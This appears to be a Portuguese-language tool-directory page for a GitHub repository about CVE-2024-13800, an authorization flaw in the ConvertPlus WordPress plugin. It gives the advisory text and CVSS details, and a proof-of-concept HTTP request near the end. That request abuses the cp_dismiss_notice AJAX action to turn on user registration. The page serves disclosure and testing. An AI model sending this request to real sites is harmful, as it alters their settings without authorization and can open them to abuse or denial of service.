Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-13800 — Plugin de Popup para WordPress - ConvertPlus <= 3.5.30 - Falta de Autorização para Usuários Autenticados (Assinante+) para Atualização Limitada de Opções | Kitploit
Ferramentas/GitHubGitHub/randomrobbiebf/cve-2024-13800
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoConfiguração Incorreta
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

Plugin de Popup para WordPress - ConvertPlus <= 3.5.30 - Falta de Autorização para Usuários Autenticados (Assinante+) para Atualização Limitada de Opções

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-13800

Plugin Popup Para WordPress - ConvertPlus <= 3.5.30 - Autorização Ausente para Atualização Limitada de Opções (Assinante+)

Descrição

O plugin ConvertPlus para WordPress é vulnerável a modificação não autorizada de dados que pode levar a uma negação de serviço devido à falta de verificação de capacidade no endpoint AJAX 'cp_dismiss_notice' em todas as versões até, e incluindo, 3.5.30. Isso possibilita que atacantes autenticados, com acesso de nível Assinante ou superior, atualizem valores de opções para '1' no site WordPress. Isso pode ser aproveitado para atualizar uma opção que criaria um erro no site e negaria serviço a usuários legítimos, ou ser usado para definir alguns valores como verdadeiros, como o registro.

Detalhes

  • Tipo: plugin
  • Slug: convertplug
  • Versão Afetada: 3.5.30
  • Pontuação CVSS: 8.1
  • Classificação CVSS: Alta
  • Vetor CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-13800
  • Status: Privado

Notas

Ele apenas insere um 1 no banco de dados, então você só pode colocar um 1 em users_can_register

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011

action=cp_dismiss_notice&notice=users_can_register
Baixar ferramenta